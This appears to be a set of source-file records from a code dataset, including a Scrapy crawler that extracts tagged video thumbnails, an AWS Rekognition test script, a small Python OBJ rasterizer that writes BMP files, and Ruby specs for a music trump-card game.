"content_id": "63571703cb6a7f37e38c325b5214036cf8213303",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 530,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 19,
"path": "/craigslist_sample/middlewares.py",
"repo_name": "aomelo/phtncrawler",
"src_encoding": "UTF-8",
"text": "# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/topics/item-pipeline.html\n\nfrom scrapy.pipelines.files import FilesPipeline\nfrom scrapy import Request\nfrom scrapy.exceptions import DropItem\nfrom scrapy.xlib.pydispatch import dispatcher\nfrom scrapy import signals\nfrom scrapy.contrib.exporter import XmlItemExporter\nimport cv2\nimport os\nimport settings\n\nclass PhMiddleware(object):\n\n def process_request(self,request,spider):\n return None"
},
{
"alpha_fraction": 0.6326530575752258,
"alphanum_fraction": 0.6326530575752258,
"avg_line_length": 20.34782600402832,
"blob_id": "294bea43af7b482ea09fb3daa15c5fb0191b6666",
"content_id": "dbccc7691b22c69adac4efd2927f955106962ada",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 490,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 23,
"path": "/craigslist_sample/items.py",
"repo_name": "aomelo/phtncrawler",
"src_encoding": "UTF-8",
"text": "# Define here the models for your scraped items\n#\n# See documentation in:\n# http://doc.scrapy.org/topics/items.html\n\nfrom scrapy.item import Item, Field\n\nclass CraigslistSampleItem(Item):\n title = Field()\n link = Field()\n\nclass PhItem(Item):\n title = Field()\n link = Field()\n id = Field()\n duration = Field()\n file_urls = Field()\n file_paths = Field()\n tags = Field()\n viewkey = Field()\n tags = Field()\n thumbnails = Field()\n thumbsFrequency = Field()"
},
{
"alpha_fraction": 0.5590121746063232,
"alphanum_fraction": 0.5662283301353455,
"avg_line_length": 32,
"blob_id": "cf9d4de40afef9356eefff90ccf28e35ce7767f1",
"content_id": "a68d70fb0d7eb1ac3efbdf8e9e855dd6ee8706aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6236,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 189,
"path": "/craigslist_sample/pipelines.py",
"repo_name": "aomelo/phtncrawler",
"src_encoding": "UTF-8",
"text": "# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/topics/item-pipeline.html\n\nfrom scrapy.pipelines.files import FilesPipeline\nfrom scrapy import Request\nfrom scrapy.exceptions import DropItem\nfrom scrapy.xlib.pydispatch import dispatcher\nfrom scrapy import signals\nfrom scrapy.contrib.exporter import JsonItemExporter\nimport numpy as np\nimport cv2\nimport os\nimport settings\nfrom scipy import ndimage\nfrom scipy.misc import imsave\nfrom settings import FILES_STORE, VIDEO_RESOLUTION, SAMPLE_INTERVAL_SEC\n\nclass CraigslistSamplePipeline(object):\n def process_item(self, item, spider):\n return item\n\n\nclass PhItemPipeline(object):\n def process_item(self, item, spider):\n return item\n\nclass Mp4Pipeline(FilesPipeline):\n\n #def get_media_requests(self, item, info):\n # for file_url in item['file_urls']:\n # yield Request(file_url)\n image_height = VIDEO_RESOLUTION\n image_width = 426\n\n def get_tags_dict(self, tags):\n tagsdict = {}\n for entry in tags.split(\",\"):\n sec = int(entry.split(\":\")[1])\n tag = entry.split(\":\")[0]\n tagsdict[sec] = tag\n return tagsdict\n\n\n def crop(self, image):\n diff_height = image.shape[0] - self.image_height\n diff_width = image.shape[1] - self.image_width\n offset_x = int(diff_height/2)\n offset_y = int(diff_width/2)\n return image[offset_x:offset_x+image_height,offset_y:offset_y+image_width]\n\n def split_thumbnails(self, image, rows=5, cols=5):\n thumbs = []\n h = image.shape[0]\n w = image.shape[1]\n t_h = h/rows\n t_w = w/cols\n for i in range(rows):\n for j in range(cols):\n thumbs.append(image[i*t_h:(i+1)*t_h , j*t_w:(j+1)*t_w])\n return thumbs\n\n def item_completed(self, results, item, info):\n file_paths = [x['path'] for ok, x in results if ok]\n if not file_paths:\n raise DropItem(\"Item contains no files\")\n\n tagsdict = self.get_tags_dict(item['tags']);\n none_tag = settings.FILES_STORE+\"None\"\n if not os.path.isdir(none_tag):\n os.mkdir(none_tag)\n for tag in tagsdict.values():\n tag = settings.FILES_STORE + tag\n if not os.path.isdir(tag):\n os.mkdir(tag)\n\n thumbs = []\n for path in file_paths:\n thumb25_path = os.path.join(FILES_STORE,path)\n thumb25 = ndimage.imread(thumb25_path)\n thumbs = thumbs + self.split_thumbnails(thumb25,5,5)\n thumb25 = None\n os.remove(thumb25_path)\n\n output_paths = []\n interval = int(item[\"thumbsFrequency\"])\n duration = int(item[\"duration\"])\n sec = 0\n for thumb in thumbs:\n if sec<duration:\n tag = \"None\"\n index = [k for k in tagsdict if k <= sec]\n if index:\n tag = tagsdict[max(index)]\n image_name = item[\"viewkey\"]+\"-frame\"+str(sec)+\".jpg\"\n image_path = os.path.join(FILES_STORE,tag,image_name)\n imsave(image_path, thumb)\n output_paths.append(image_path)\n sec += interval\n item[\"file_paths\"] = output_paths\n\n\n\n\n\n\n\n def item_completed_vid(self, results, item, info):\n file_paths = [x['path'] for ok, x in results if ok]\n if not file_paths:\n raise DropItem(\"Item contains no files\")\n\n output_paths = []\n for path in file_paths:\n tagsdict = self.get_tags_dict(item['tags']);\n vid_path = os.path.join(FILES_STORE,path)\n vid = cv2.VideoCapture(vid_path)\n id = item[\"id\"]\n\n none_tag = settings.FILES_STORE+\"None\"\n if not os.path.isdir(none_tag):\n os.mkdir(none_tag)\n for tag in tagsdict.values():\n tag = settings.FILES_STORE + tag\n if not os.path.isdir(tag):\n os.mkdir(tag)\n\n print item['duration']\n duration = int(item['duration'])\n\n success = True\n sec 
= 0\n success,image = vid.read()\n #if image.shape[0] != self.image_height or image.shape[1] < self.image_width:\n # return None\n print image.shape\n\n\n while success and sec <= duration:\n #if image.shape[1] > self.image_width:\n # image = crop(image)\n\n tag = \"None\"\n index = [k for k in tagsdict if k <= sec]\n if index:\n tag = tagsdict[max(index)]\n image_name = item[\"viewkey\"]+\"-frame\"+str(sec)+\".jpg\"\n image_path = os.path.join(FILES_STORE,tag,image_name)\n cv2.imwrite(image_path, image)\n output_paths.append(image_path)\n sec = sec + SAMPLE_INTERVAL_SEC\n vid.set(0,sec*1000) # 0 = CAP_PROP_POS_MSEC\n success,image = vid.read()\n vid.release()\n os.remove(vid_path)\n\n item['file_paths'] = output_paths\n return item\n\n #def process_item(self, item, spider):\n # info = self.spiderinfo\n # requests = arg_to_iter(self.get_media_requests(item, info))\n # dlist = [self._process_request(r, info, item) for r in requests]\n # dfd = DeferredList(dlist, consumeErrors=1)\n # return dfd.addCallback(self.item_completed, item, info)\n\n\nclass XmlExportPipeline(object):\n\n def __init__(self):\n dispatcher.connect(self.spider_opened, signals.spider_opened)\n dispatcher.connect(self.spider_closed, signals.spider_closed)\n self.files = {}\n\n def spider_opened(self, spider):\n file = open('%s_items.xml' % spider.name, 'w+b')\n self.files[spider] = file\n self.exporter = JsonItemExporter(file)\n self.exporter.start_exporting()\n\n def spider_closed(self, spider):\n self.exporter.finish_exporting()\n file = self.files.pop(spider)\n file.close()\n\n def process_item(self, item, spider):\n self.exporter.export_item(item)\n return item"
},
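`split_thumbnails` above slices a 5x5 mosaic into 25 equal tiles with plain array indexing; the sketch below is the same idea as a list comprehension, assuming only numpy. The 90x160 tile size matches the dimensions the spider checks for.

```python
import numpy as np

def split_tiles(image, rows=5, cols=5):
    h, w = image.shape[0] // rows, image.shape[1] // cols
    return [image[r * h:(r + 1) * h, c * w:(c + 1) * w]
            for r in range(rows) for c in range(cols)]

mosaic = np.zeros((450, 800, 3), dtype=np.uint8)   # 5x5 grid of 90x160 tiles
tiles = split_tiles(mosaic)
assert len(tiles) == 25 and tiles[0].shape == (90, 160, 3)
```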
{
"alpha_fraction": 0.8426966071128845,
"alphanum_fraction": 0.8426966071128845,
"avg_line_length": 43.5,
"blob_id": "4e49e0315641349f21818a439aa00fec25b3c437",
"content_id": "a94ad63364d34a9608360e4c05dac47c7a3b3ad9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 89,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 2,
"path": "/README.md",
"repo_name": "aomelo/phtncrawler",
"src_encoding": "UTF-8",
"text": "# phtncrawler\nPh crawler with screenshots taken from thumbnails and categories as labels\n"
},
{
"alpha_fraction": 0.6837438344955444,
"alphanum_fraction": 0.7300492525100708,
"avg_line_length": 30.71875,
"blob_id": "df42bd776b79b9c48fc5413580126469915568e8",
"content_id": "32d08118a9da2e047a83bb69e293dc98293446bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1015,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 32,
"path": "/craigslist_sample/settings.py",
"repo_name": "aomelo/phtncrawler",
"src_encoding": "UTF-8",
"text": "# Scrapy settings for craigslist_sample project\n#\n# For simplicity, this file contains only the most important settings by\n# default. All the other settings are documented here:\n#\n# http://doc.scrapy.org/topics/settings.html\n#\n\nBOT_NAME = 'craigslist_sample'\n\nDOWNLOAD_HANDLERS = {'s3': None}\n\nSPIDER_MODULES = ['craigslist_sample.spiders']\nNEWSPIDER_MODULE = 'craigslist_sample.spiders'\nITEM_PIPELINES = {'craigslist_sample.pipelines.Mp4Pipeline': 1#,\n #'craigslist_sample.pipelines.XmlExportPipeline': 2\n }\nDOWNLOADER_MIDDLEWARES = {\n 'craigslist_sample.middlewares.PhMiddleware': 543,\n}\nFILES_STORE = './data/'\nFILES_EXPIRES = 7\nSAMPLE_INTERVAL_SEC = 5\nVIDEO_RESOLUTION = '240' # 240p,480p,720p,1080p\nCOOKIES_ENABLED = False\nDOWNLOAD_DELAY = 1\nDOWNLOAD_MAXSIZE = 257741824\nDOWNLOAD_WARNSIZE = 107741824\nDOWNLOAD_TIMEOUT = 600\n\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\n#USER_AGENT = 'craigslist_sample (+http://www.yourdomain.com)'\n"
}
] | 6 |
UZ-junski/python_boto3
|
https://github.com/UZ-junski/python_boto3
|
efb11d5df50396532fc772cf21d70a627451f678
|
0c1ce83077bc85f62baa1f37d5ab3d2fa308d9bb
|
305d4d6d415345e7d35396f19cfa52bde446e18d
|
refs/heads/master
| 2022-09-17T15:43:04.635878 | 2020-05-29T19:13:21 | 2020-05-29T19:13:21 | 267,934,076 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6425396800041199,
"alphanum_fraction": 0.671746015548706,
"avg_line_length": 33.977779388427734,
"blob_id": "2eccaa9134bc56ec261f0afd6f17a3635dc5c0e8",
"content_id": "f6a1124b77a53980639657ed2b377673de5a00ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1575,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 45,
"path": "/SJU_boto_recognition.py",
"repo_name": "UZ-junski/python_boto3",
"src_encoding": "UTF-8",
"text": "from PIL import Image\nimport boto3\nimport time\nimport os\nimport json\n\nbase = os.getcwd()\nmanPhotoDir = os.path.join(base,'ver_3')\n#photo = '3.png'\nregion='eu-west-1'\n\n#with open(photo, 'rb') as source_image:\n# source_bytes = source_image.read()\nxVectors = [-50, 0, 50]\nyVectors = [100, 150, 200, 250, 300]\nsavedPhotos = [1, 2, 3, 4, 5, 6]\nphotosType = ['FrontOff1', 'FrontOff2', 'FrontOn1', 'FrontOn2', 'Back1', 'Back2']\nfileNames =list()\nprint('geting paths of files')\nfor y in yVectors:\n for x in xVectors:\n for photoNo in savedPhotos:\n fileNames.append(os.path.join(os.path.join(manPhotoDir, str(y) + '_' + str(x) ), str(photoNo) +'.bmp'))\nresultDictionary = dict.fromkeys(fileNames , '')\nformatTimes = list()\nprint('convert bmps to png')\nfor fName in fileNames:\n start_time = time.time()\n Image.open(fName).save(fName.replace('.bmp', '.png'))\n resultDictionary[fName]=str((time.time() - start_time)*1000)\n# formatTimes.append()\n#print(\"Times for coverting files\")\n#print(', '.join(str(x) for x in formatTimes))\nprint('sending requests')\nclient = boto3.client('rekognition')\nfor fName in fileNames:\n with open(fName.replace('.bmp', '.png'), 'rb') as source_image:\n source_bytes = source_image.read()\n start_time = time.time()\n response = client.detect_labels(Image={'Bytes': source_bytes}, MaxLabels = 3)\n resultDictionary[fName]+=';'+str((time.time() - start_time)*1000)+os.linesep+json.dumps(response)\nprint('saving responses')\na_file = open('results.json', 'w')\njson.dump(resultDictionary, a_file)\na_file.close()\n\n"
}
] | 1 |
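The triple nested loop that builds `fileNames` in the script above flattens cleanly with `itertools.product`; the directory layout below mirrors the script's `ver_3/<y>_<x>/<n>.bmp` convention.

```python
import os
from itertools import product

x_vectors = [-50, 0, 50]
y_vectors = [100, 150, 200, 250, 300]
photo_nos = [1, 2, 3, 4, 5, 6]

file_names = [os.path.join('ver_3', '%d_%d' % (y, x), '%d.bmp' % n)
              for y, x, n in product(y_vectors, x_vectors, photo_nos)]
assert len(file_names) == 5 * 3 * 6
```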
Diego223/SR3
|
https://github.com/Diego223/SR3
|
9b30d1f491e0a2d8c1211ce8765e96ac72fad293
|
e4e0db43e21085c48b6ad1ffd944cd5bfd4c75c3
|
bc5f419d2580d0b93230fd5a0d1ebe6bbef7cacb
|
refs/heads/main
| 2023-07-08T00:07:57.515098 | 2021-07-31T20:09:11 | 2021-07-31T20:09:11 | 390,601,341 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.44595804810523987,
"alphanum_fraction": 0.46549561619758606,
"avg_line_length": 26.464284896850586,
"blob_id": "8a1a733679adb4ce55509387b9e2b8e8926ee796",
"content_id": "251c388fa404ff6793486d0dd507f1466429fa01",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5579,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 196,
"path": "/SR3 OBJ LOADER/Base.py",
"repo_name": "Diego223/SR3",
"src_encoding": "UTF-8",
"text": "#Universidad del Valle de Guatemala\r\n#Graficas por Computadora\r\n#Laboratorio SR3\r\n#Diego Crespo 19541\r\nimport struct\r\nfrom collections import namedtuple\r\nfrom Loader import Obj\r\n\r\nLineV2 = namedtuple('Point2', ['x', 'y'])\r\n\r\ndef bytec(c):\r\n return struct.pack('=c', c.encode('ascii'))\r\n\r\ndef duo(w):\r\n return struct.pack('=h', w)\r\n\r\ndef dduo(d):\r\n return struct.pack('=l', d)\r\n\r\ndef color(r, g, b):\r\n return bytes([int(b * 255), int(g * 255), int(r * 255)])\r\n\r\n\r\nblack = color(0, 0, 0)\r\nwhite = color(1, 1, 1)\r\n\r\n\r\nclass Engine(object):\r\n def __init__(self, width, height):\r\n self.pointsColor = white\r\n self.bgColor = black\r\n self.newWindow(width, height)\r\n\r\n def Viewport(self, x, y, width, height):\r\n self.viewX = x\r\n self.viewY = y\r\n self.portWidth = width\r\n self.portHeight = height\r\n\r\n def Clear(self):\r\n self.pixels = [[ self.bgColor for y in range(self.height)] for x in range(self.width)]\r\n\r\n def newWindow(self, width, height):\r\n self.width = width\r\n self.height = height\r\n self.Clear()\r\n self.Viewport(0, 0, width, height)\r\n \r\n def changeColor(self, r, g, b):\r\n self.pointsColor = color(r, g, b)\r\n\r\n def bgColor(self, r, g, b):\r\n self.bgColor = color(r, g, b)\r\n\r\n def Vertex(self, x, y, color = None):\r\n if x < self.viewX or x >= self.viewX + self.portWidth or y < self.viewY or y >= self.viewY + self.portHeight:\r\n return\r\n\r\n if (0 < x < self.width) and (0 < y < self.height):\r\n self.pixels[int(x)][int(y)] = color or self.pointsColor\r\n\r\n def nVertex(self, x, y, color = None):\r\n x = int( (x + 1) * (self.portWidth / 2) + self.viewX )\r\n y = int( (y + 1) * (self.portHeight / 2) + self.viewY)\r\n \r\n if x < self.viewX or x >= self.viewX + self.portWidth or y < self.viewY or y >= self.viewY + self.portHeight:\r\n return\r\n\r\n if (0 <= x < self.width) and (0 <= y < self.height):\r\n self.pixels[int(x)][int(y)] = color or self.pointsColor\r\n\r\n def Line(self, v0, v1, color=None):\r\n xi = v0.x\r\n xf = v1.x\r\n yi = v0.y\r\n yf = v1.y\r\n\r\n if xi == xf and yi == yf:\r\n self.Vertex(xi,yf,color)\r\n return\r\n\r\n dx = abs(xf - xi)\r\n dy = abs(yf - yi)\r\n\r\n step = dy > dx\r\n\r\n if step:\r\n xi, yi = yi, xi\r\n xf, yf = yf, xf\r\n\r\n if xi > xf:\r\n xi, xf = xf, xi\r\n yi, yf = yf, yi\r\n\r\n dx = abs(xf - xi)\r\n dy = abs(yf - yi)\r\n\r\n offset = 0\r\n limit = 0.5\r\n m = dy/dx\r\n y = yi\r\n\r\n for x in range(xi, xf + 1):\r\n if step:\r\n self.Vertex(y, x, color)\r\n else:\r\n self.Vertex(x, y, color)\r\n\r\n offset += m\r\n if offset >= limit:\r\n y += 1 if yi < yf else -1\r\n limit += 1\r\n\r\n def nLine(self, v0, v1, color = None):\r\n xi = int( (v0.x + 1) * (self.portWidth / 2) + self.viewX)\r\n xf = int( (v1.x + 1) * (self.portWidth / 2) + self.viewX)\r\n yi = int( (v0.y + 1) * (self.portHeight / 2) + self.viewY)\r\n yf = int( (v1.y + 1) * (self.portHeight / 2) + self.viewY)\r\n\r\n dx = abs(xf - xi)\r\n dy = abs(yf - yi)\r\n\r\n step = dy > dx\r\n\r\n if step:\r\n xi, yi = yi, xi\r\n xf, yf = yf, xf\r\n\r\n if xi > xf:\r\n xi, xf = xf, xi\r\n yi, yf = yf, yi\r\n\r\n dx = abs(xf - xi)\r\n dy = abs(yf - yi)\r\n\r\n offset = 0\r\n limit = 0.5\r\n m = dy/dx\r\n y = yi\r\n\r\n for x in range(xi, xf + 1):\r\n if step:\r\n self.glPoint(y, x, color)\r\n else:\r\n self.glPoint(x, y, color)\r\n offset += m\r\n if offset >= limit:\r\n y += 1 if yi < yf else -1\r\n limit += 1\r\n\r\n def loadOBJ(self, filename, translate = LineV2(0.0,0.0), scale = 
LineV2(1.0,1.0)):\r\n\r\n model = Obj(filename)\r\n\r\n for face in model.faces:\r\n vertsCount = len(face)\r\n\r\n for v in range(vertsCount):\r\n\r\n indexi = face[v][0] - 1\r\n indexf = face[(v + 1) % vertsCount][0] - 1\r\n\r\n verti = model.verts[indexi]\r\n vertf = model.verts[indexf]\r\n\r\n xi = round(verti[0] * scale.x + translate.x)\r\n yi = round(verti[1] * scale.y + translate.y)\r\n xf = round(vertf[0] * scale.x + translate.x)\r\n yf = round(vertf[1] * scale.y + translate.y)\r\n\r\n self.Line(LineV2(xi,yi), LineV2(xf, yf))\r\n\r\n #crea archivo bmp\r\n def glFinish(self, filename):\r\n with open(filename, \"wb\") as file:\r\n file.write(bytes('B'.encode('ascii')))\r\n file.write(bytes('M'.encode('ascii')))\r\n file.write(dduo(14 + 40 + (self.width * self.height * 3)))\r\n file.write(dduo(0))\r\n file.write(dduo(14 + 40))\r\n\r\n file.write(dduo(40))\r\n file.write(dduo(self.width))\r\n file.write(dduo(self.height))\r\n file.write(duo(1))\r\n file.write(duo(24))\r\n file.write(dduo(0))\r\n file.write(dduo(self.width * self.height * 3))\r\n file.write(dduo(0))\r\n file.write(dduo(0))\r\n file.write(dduo(0))\r\n file.write(dduo(0))\r\n\r\n for y in range(self.height):\r\n for x in range(self.width):\r\n file.write(self.pixels[x][y])\r\n"
},
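`glFinish` above emits the 54 bytes of BMP header field by field. The same header can be built with two `struct.pack` calls; a minimal sketch for a 24-bit, uncompressed, bottom-up image whose width is a multiple of 4, so no row padding is needed (true for the 1920x1080 output in `Engine.py`).

```python
import struct

def bmp_header(width, height):
    row_bytes = width * 3                       # assumes width % 4 == 0
    pixel_bytes = row_bytes * height
    file_header = struct.pack('<2sIHHI', b'BM', 14 + 40 + pixel_bytes,
                              0, 0, 14 + 40)
    info_header = struct.pack('<IiiHHIIiiII', 40, width, height, 1, 24,
                              0, pixel_bytes, 0, 0, 0, 0)
    return file_header + info_header

assert len(bmp_header(1920, 1080)) == 54
```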
{
"alpha_fraction": 0.4682779312133789,
"alphanum_fraction": 0.4753272831439972,
"avg_line_length": 30.032258987426758,
"blob_id": "c0b4d685c9f3d53c9f8df21291fd1585b1908f1c",
"content_id": "744869197c6d97e037c36edc43e01e881b226238",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 993,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 31,
"path": "/SR3 OBJ LOADER/Loader.py",
"repo_name": "Diego223/SR3",
"src_encoding": "UTF-8",
"text": "#Universidad del Valle de Guatemala\r\n#Graficas por Computadora\r\n#Laboratorio SR3\r\n#Diego Crespo 19541\r\n\r\nclass Obj(object):\r\n def __init__(self, filename):\r\n with open(filename, \"r\") as file:\r\n self.lines = file.read().splitlines()\r\n\r\n self.verts = []\r\n self.tcoord = []\r\n self.normals = []\r\n self.faces = []\r\n\r\n self.read()\r\n\r\n\r\n def read(self):\r\n for line in self.lines:\r\n if line:\r\n prefix, value = line.split(' ', 1)\r\n\r\n if prefix == 'v':\r\n self.verts.append(list(map(float, value.split(' '))))\r\n elif prefix == 'vt': \r\n self.tcoord.append(list(map(float, value.split(' '))))\r\n elif prefix == 'vn':\r\n self.normals.append(list(map(float, value.split(' '))))\r\n elif prefix == 'f':\r\n self.faces.append( [ list(map(int, vert.split('/'))) for vert in value.split(' ')] )\r\n"
},
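The `'f'` branch of `Obj.read` above parses a face line into per-corner index triples; a tiny standalone demonstration. Note that the indices are 1-based (the renderer subtracts 1 before indexing `verts`), and that the `v//vn` form with an empty texcoord slot would raise `ValueError` in this simple parser.

```python
def parse_face(value):
    return [list(map(int, vert.split('/'))) for vert in value.split(' ')]

print(parse_face("1/1/1 2/3/1 4/2/1"))
# -> [[1, 1, 1], [2, 3, 1], [4, 2, 1]]
```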
{
"alpha_fraction": 0.6545454263687134,
"alphanum_fraction": 0.7272727489471436,
"avg_line_length": 18.75,
"blob_id": "bfbe268d6f2ce426bb6983e9db488f5de6f98def",
"content_id": "2265f2fafea98b5590639a4421a7e88e125fad66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 330,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 16,
"path": "/SR3 OBJ LOADER/Engine.py",
"repo_name": "Diego223/SR3",
"src_encoding": "UTF-8",
"text": "#Universidad del Valle de Guatemala\r\n#Graficas por Computadora\r\n#Laboratorio SR3\r\n#Diego Crespo 19541\r\nfrom Base import LineV2, Engine, color\r\nimport random\r\n\r\nwidth = 1920\r\nheight = 1080\r\n\r\ndrawer = Engine(width, height)\r\n\r\ndrawer.loadOBJ(\"face.obj\", LineV2(width/2, height/6), LineV2(30,30))\r\n\r\n\r\ndrawer.glFinish(\"SALIDAMODELO3D.bmp\")"
}
] | 3 |
jcoglan/mu_trumps
|
https://github.com/jcoglan/mu_trumps
|
5d01cb7580ca6b20652b79468b5b8c828de2fc03
|
bd41b0a686d4152d4e4ac77bea0fb414ff1e5f59
|
106e5b425e36032fbac80387f4a79974bf3be08b
|
refs/heads/master
| 2020-04-26T09:45:17.403075 | 2011-01-27T15:00:13 | 2011-01-27T15:00:13 | 1,284,268 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6200000047683716,
"alphanum_fraction": 0.6200000047683716,
"avg_line_length": 17.18181800842285,
"blob_id": "73c5af5c0243f37dafc2bca9de2467b533b7854a",
"content_id": "4fcfaba2f302734ae8bae0be9777f736dc0af073",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 400,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 22,
"path": "/spec/mu_trumps/model/user_spec.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require 'spec_helper'\n\ndescribe MuTrumps::User do\n let(:user) do\n MuTrumps::User.create(:lastfm_username => \"jcoglan\")\n end\n \n it \"is valid\" do\n user.should be_valid\n end\n \n describe \"with artists\" do\n before do\n @artist = Factory(:artist)\n user.artists << @artist\n end\n \n it \"returns the artists\" do\n user.reload.artists.should == [@artist]\n end\n end\nend\n"
},
{
"alpha_fraction": 0.6037902235984802,
"alphanum_fraction": 0.6051123738288879,
"avg_line_length": 28.855262756347656,
"blob_id": "3519aef96062cb11be19c9109a4218546874e6bd",
"content_id": "1d2b15511ee62d4121f011ace631a96f04126d08",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 4538,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 152,
"path": "/spec/mu_trumps/model/game_spec.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require 'spec_helper'\n\ndescribe MuTrumps::Game do\n before do\n @imogen = Factory(:artist, :name => \"Imogen Heap\", :id => 100)\n @justin = Factory(:artist, :name => \"Justin Bieber\")\n @gaga = Factory(:artist, :name => \"Lady Gaga\")\n @sufjan = Factory(:artist, :name => \"Sufjan Stevens\")\n end\n \n let(:alice) { Factory :user, :lastfm_username => \"alice\" }\n let(:bob) { Factory :user, :lastfm_username => \"bob\" }\n \n describe \"join\" do\n before do\n MuTrumps::Artist.stub(:random).and_return MuTrumps::Artist.all\n end\n \n describe \"when there are no games\" do\n let(:game) { MuTrumps::Game.join(alice) }\n \n it \"returns a new game with one participant\" do\n game.should be_kind_of(MuTrumps::Game)\n game.users.should == [alice]\n end\n \n it \"returns a game in the waiting state\" do\n game.status.should == \"waiting\"\n end\n \n it \"assigns half the game deck to the user\" do\n game.cards_for(alice).map { |c| c.artist.name }.should == [\"Imogen Heap\", \"Lady Gaga\"]\n end\n end\n \n describe \"when there is a game with no participants\" do\n before do\n @game = MuTrumps::Game.create!\n end\n \n it \"returns the game\" do\n MuTrumps::Game.join(alice).should == @game\n end\n end\n \n describe \"when there is a game with one participant\" do\n let(:game) { MuTrumps::Game.join(bob) }\n \n before do\n @existing_game = MuTrumps::Game.create(:users => [alice])\n end\n \n it \"returns the waiting game with two participants\" do\n game.should == @existing_game\n game.users.should == [alice, bob]\n end\n \n it \"returns a game in the ready state\" do\n game.status.should == \"ready\"\n end\n \n it \"assigns the other half of the game deck to the user\" do\n game.cards_for(bob).map { |c| c.artist.name }.should == [\"Justin Bieber\", \"Sufjan Stevens\"]\n end\n end\n end\n \n describe \"leave\" do\n let(:game) { MuTrumps::Game.join(alice) }\n \n it \"removes the player from the game\" do\n game.leave(alice)\n game.reload.users.should == []\n end\n \n it \"throws an error if the user is not in the game\" do\n lambda { game.leave(bob) }.should raise_error(MuTrumps::Game::UnknownPlayer)\n end\n end\n \n describe \"cards\" do\n it \"is populated from random artists when a game is created\" do\n all_artists = MuTrumps::Artist.all\n MuTrumps::Artist.should_receive(:random).with(52).and_return all_artists\n game = MuTrumps::Game.create\n game.cards.map(&:artist).should == all_artists\n end\n end\n\n describe \"play\" do\n before do\n MuTrumps::Game.join(alice)\n @game = MuTrumps::Game.join(bob)\n\n MuTrumps::Artist.all.each_with_index do |artist, index|\n artist.assign(\"stamina\", index)\n end\n end\n\n it \"throws an error if the wrong player tries to play\" do\n @game.current_user.should == alice\n lambda { @game.play(bob, @justin, \"stamina\") }.should raise_error(MuTrumps::Game::PlayOutOfTurn)\n end\n\n it \"throws an error if the artist is not at the top of the user's deck\" do\n @game.current_artist_for(alice).should == @imogen\n lambda { @game.play(alice, @gaga, \"stamina\") }.should raise_error(MuTrumps::Game::NotInDeck)\n end\n \n it \"sets the current stat for the round\" do\n @game.current_stat.should be_nil\n @game.play(alice, @imogen, \"stamina\")\n @game.current_stat.should == \"stamina\"\n end\n \n it \"decides the round when the other player acks\" do\n @game.play(alice, @imogen, \"stamina\")\n @game.should_receive(:round_won_by).with(bob)\n @game.ack(bob)\n @game.current_stat.should be_nil\n end\n \n describe \"when the attacker uses a stat the defense does not 
have\" do\n before do\n @imogen.assign(\"soundcloud_meetings\", 1)\n end\n \n it \"lets the attacker win\" do\n @game.play(alice, @imogen, \"soundcloud_meetings\")\n @game.should_receive(:round_won_by).with(alice)\n @game.ack(bob)\n end\n end\n end\n\n describe \"round_won_by\" do\n before do\n MuTrumps::Game.join(bob)\n @game = MuTrumps::Game.join(alice)\n end\n\n it \"transfers both current cards to the deck of the winner\" do\n @game.round_won_by(alice)\n @game.cards_for(alice).map(&:artist).should == [@sufjan, @imogen, @justin]\n end\n \n it \"makes the winner of the round the current player\" do\n @game.round_won_by(alice)\n @game.current_user.should == alice\n end\n end\nend\n"
},
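The spec above fixes the round rule: the attacker names a stat, the higher value wins, and a stat missing from the defender's card is an automatic win for the attacker. A language-agnostic sketch (written in Python like the other examples here); how ties resolve is not covered by the spec, so ties-go-to-the-defender below is an assumption.

```python
def round_winner(attacker, defender, attack_card, defend_card, stat):
    if stat not in defend_card:
        return attacker                      # defense lacks the stat
    if attack_card[stat] > defend_card[stat]:
        return attacker
    return defender                          # assumption: ties favor defense

assert round_winner('alice', 'bob', {'stamina': 0}, {'stamina': 1},
                    'stamina') == 'bob'
assert round_winner('alice', 'bob', {'soundcloud_meetings': 1},
                    {'stamina': 1}, 'soundcloud_meetings') == 'alice'
```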
{
"alpha_fraction": 0.7413793206214905,
"alphanum_fraction": 0.7413793206214905,
"avg_line_length": 28,
"blob_id": "c1753dbfc4b0ad37de286a820509f53beca6f4b8",
"content_id": "1e886235334ff5ae8d32490f6aafe34a615f0722",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 58,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 2,
"path": "/config.ru",
